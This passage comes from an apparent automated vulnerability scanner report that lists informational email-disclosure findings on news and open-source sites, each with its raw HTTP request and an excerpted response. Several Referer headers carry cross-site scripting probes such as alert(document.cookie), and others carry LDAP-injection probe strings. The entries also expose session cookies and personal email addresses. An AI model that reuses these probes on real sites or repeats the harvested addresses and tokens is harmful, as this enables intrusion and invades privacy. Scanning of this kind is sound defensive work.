Host:   http://www.msnbc.redacted
Path:   /id/41327817/ns/world_news-mideastn_africa/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...
<a class="share" href="mailto:name@address.com?subject=Share%20this%20interactive">
...[SNIP]...

26.119. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41327924/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41327924/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181055


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20photo" class="sharelink" title="Share this photo">
...[SNIP]...

26.120. http://www.msnbc.redacted/id/41328059/ns/us_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41328059/ns/us_news/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41328059/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60365


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.121. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41328834/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41328834/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 55426


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.122. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41329947/ns/us_news-crime_and_courts/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41329947/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 61260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.123. http://www.msnbc.redacted/id/41330515/ns/us_news-life/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41330515/ns/us_news-life/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41330515/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 67355


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.124. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41330876/ns/world_news-europe/

Issue detail

The following email address was disclosed in the response:

Request

GET /id/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 56613


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<a href="mailto:name@address.com?subject=Share%20this%20story" class="sharelink" title="Share this story">
...[SNIP]...

26.125. http://www.nasawatch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nasawatch.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.nasawatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:12:31 GMT
Server: Apache/1.3.41 (Darwin) mod_ssl/2.8.31 OpenSSL/0.9.7l PHP/4.4.9 mod_perl/1.29
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:13:31 GMT
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 96832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six
...[SNIP]...
<a href="mailto:nasawatch@spaceref.com">nasawatch@spaceref.com</a>
...[SNIP]...
<a href="mailto:nasawatch@spaceref.com">nasawatch@spaceref.com</a>
...[SNIP]...
<a href="mailto:kcowing@spaceref.com">
...[SNIP]...
<a href="mailto:marc.boucher@spaceref.com">
...[SNIP]...

26.126. http://www.newsvine.com/_vine/js/vs/master.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /_vine/js/vs/master.xml

Issue detail

The following email addresses were disclosed in the response:

Request

GET /_vine/js/vs/master.xml?r=554227 HTTP/1.1
Host: www.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296399959031

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:03:59 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sun, 30 Jan 2011 15:03:51 GMT
ETag: "12582b2-7d67f-49b119b69e3c0"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 15:03:59 GMT
Content-Type: text/xml
Content-Length: 513663

<?xml version="1.0" encoding="utf-8" ?>
<Wrapper>
   <events>
       <ActionRecord>
           <date>1296399241000</date>
           <action><![CDATA[Comment Vote]]></action>
           <subHeadline><![CDATA[]]></subHeadline>
           <s
...[SNIP]...
<![CDATA[RichMJones@rcn.com]]>
...[SNIP]...
<![CDATA[webmaster@newsvine.com]]>
...[SNIP]...
<![CDATA[webmaster@newsvine.com]]>
...[SNIP]...

26.127. https://www.newsvine.com/_vine/js/msnbc/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_vine/js/msnbc/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_vine/js/msnbc/s_code.js?v=23247 HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Referer: https://www.newsvine.com/_nv/accounts/login?aede4%22%3E%3Cscript%3Ealert(1)%3C/script%3E23d43ff5841=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=737406501fadd3f45b7f4acf77a8cd72

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:59:40 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 16 Nov 2010 18:37:08 GMT
ETag: "834a5e-448e-4952fd8137d00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 16:59:40 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 17550

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.128. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:00:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 30 Jan 2011 01:50:28 GMT
ETag: "cccc2ce42797085e2ccf82df13a9cd5b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

26.129. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:55 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 29 Jan 2011 23:16:07 GMT
ETag: "1126140718825d2e8a4072da2e624330"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

26.130. http://www.polls.newsvine.com/_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/3523ed6c0a92179cbcf864e66c3b25d367f590e6.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:58:08 GMT
ETag: "d1f753-322e-49af283a16c00"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 01:17:40 GMT
Date: Sun, 30 Jan 2011 01:17:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12846

/*v23247: 2011-01-28T17:58:08*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.131. http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/?f5644%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E059427e1b2e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:51:51 GMT
ETag: "16e4a40-35a2-49af26d28dbc0"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=478881
Expires: Sat, 05 Feb 2011 01:53:28 GMT
Date: Sun, 30 Jan 2011 12:52:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:51:51*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.132. http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; jt_time=1296407787899; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:59:14 GMT
ETag: "2c556e3-3ed3-49af287908080"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=526858
Expires: Sat, 05 Feb 2011 20:16:01 GMT
Date: Sun, 30 Jan 2011 17:55:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16083

/*v23247: 2011-01-28T17:59:14*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.133. http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/?4ad7a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5aa1ea45b3a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:52:22 GMT
ETag: "16e4a62-35a2-49af26f01e180"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=480912
Expires: Sat, 05 Feb 2011 02:24:10 GMT
Date: Sun, 30 Jan 2011 12:48:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:52:22*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.134. http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polls.newsvine.com
Path:   /_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
ETag: "d1f6a3-35a2-49af270ea2980"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=604800
